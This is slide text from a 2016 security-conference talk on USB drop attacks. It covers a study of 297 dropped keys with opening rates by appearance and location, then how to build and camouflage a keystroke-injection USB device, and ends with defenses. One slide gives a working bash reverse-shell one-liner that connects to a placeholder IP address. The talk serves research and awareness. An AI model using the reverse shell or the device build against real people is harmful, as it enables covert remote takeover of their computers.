Professional Documents
Culture Documents
Us 16 Bursztein Does Dropping USB Drives in Parking Lots and Other Places Really Work
Us 16 Bursztein Does Dropping USB Drives in Parking Lots and Other Places Really Work
Us 16 Bursztein Does Dropping USB Drives in Parking Lots and Other Places Really Work
REALLY WORK?
USA 2016
Elie Bursztein
https://ly.tl/malusb
https://ly.tl/malusb
MR robot
https://ly.tl/malusb
Does dropping USB keys really work?
https://ly.tl/malusb
Agenda
https://ly.tl/malusb
The different types of USB attacks
https://ly.tl/malusb
Types of attack carried via USB drive
https://ly.tl/malusb
Social engineering illustrated
Contains
https://ly.tl/malusb
HID illustrated Attacker’s
Server
Connect
(reverse tcp shell)
Keystroke
Emulate
injection
Emulated
keyboard Victim’s
HID USB
computer
https://ly.tl/malusb
Attacks pros & cons
Complexity
Attack vector Mostly used by Reliability Stealth Cross OS
& Cost
Social Academics
engineering Our study!
Government
0-day
High-end corp espionage
https://ly.tl/malusb
How effective are USB drop attacks?
https://ly.tl/malusb
Game Plan
Drop 297 USB keys
and see what happens
https://ly.tl/malusb
Experimental setup
https://ly.tl/malusb
Server Optional survey
(GAE)
Create files
https://ly.tl/malusb
USB keys appearance
https://ly.tl/malusb
USB keys content
https://ly.tl/malusb
Drop action
https://ly.tl/malusb
Drop map
https://ly.tl/malusb
Busted on Reddit
https://ly.tl/malusb
45% of the keys phoned home
https://ly.tl/malusb
https://ly.tl/malusb
Study in numbers
Total Fraction
https://ly.tl/malusb
Click rate over time for opened keys
90%
80%
60%
50%
40%
30%
20%
10%
0%
0h 5h 10h 15h 20h 25h 30h 35h
https://ly.tl/malusb
Opening rate by USB key appearance
Exams 50%
Confidential 50%
None 45%
Physical Keys
29%
& Return Label
https://ly.tl/malusb
Opening rate by drop location
Outside 47%
Hallway 41%
https://ly.tl/malusb
Self-reported motivation
Other
14%
Curious 18%
68%
Returning
drive
https://ly.tl/malusb
Type of documents opened
53%
50%
20%
18%
14%
10%
0%
Picture Resume Other documents
With physical keys With return label Nothing
Some people have opened multiple file types which explains the percentages not adding up to 100%. https://ly.tl/malusb
Making USB drop attack effective
https://ly.tl/malusb
Would you plug those?
emulation
https://ly.tl/malusb
Hardware
Teensy 3.2:
C framework
Arduino compatible
https://ly.tl/malusb
Payload
Payload crafting
https://ly.tl/malusb
Staging overview
GOTCHA: No direct feedback
Driver loaded?
No easy way to test for
Reverse shell
execution Use CAPS lock key toggling as
feedback bit
https://ly.tl/malusb
Testing if drivers are loaded
https://ly.tl/malusb
Spawning a reverse-shell
Reverse shell to pierce through
Open terminal firewall
https://ly.tl/malusb
MacOS (OSX) & Linux payload
Ideas:
Use bash to create a reverse shell nohup bash -c \"while true;do bash -i >& /dev/tcp/
1.2.3.4/443 0>&1 2>&1; sleep 1;done\" 1>/dev/null &
Inner payload inspired by powerfun created by Ben Turner & Dave Hardy https://ly.tl/malusb
Key camouflaging
https://ly.tl/malusb
Starting point: teensy
https://ly.tl/malusb
A long way to go
https://ly.tl/malusb
Using raw type A connector
https://ly.tl/malusb
Type A connector soldered to Teensy
https://ly.tl/malusb
A step in the right direction
https://ly.tl/malusb
Getting there takes practice :)
https://ly.tl/malusb
Preparing the silicon
https://ly.tl/malusb
Casting the silicon mold using a real key
https://ly.tl/malusb
Silicon mold
https://ly.tl/malusb
Resin and color
https://ly.tl/malusb
Casting a USB key
https://ly.tl/malusb
Trimming the excess of resin
https://ly.tl/malusb
A difficult start
https://ly.tl/malusb
Getting there!
https://ly.tl/malusb
Camouflage successful!
https://ly.tl/malusb
Material cost
Teensy $20
Total ~$40
https://ly.tl/malusb
The “lazy” approach - not as good as resin casting!
https://ly.tl/malusb
Defending against USB attacks
https://ly.tl/malusb
Takeaways
No easy defense
AV won’t save you from this attack, device policy and awareness will
https://ly.tl/malusb
Co-conspirators
Cealtea: Camouflage expert
https://ly.tl/malusb
Build your own HID key - get a free one
“How-to” blog post: https://ly.tl/malusb
Code: https://github.com/LightWind/malusb
https://ly.tl/malusb
Kickstarter?
Thinking of a Kickstarter to create
an advanced HID USB with:
● Realistic look
● Hardware based fingerprint
● Remote exfiltration (GSM or Wifi)
https://ly.tl/malusb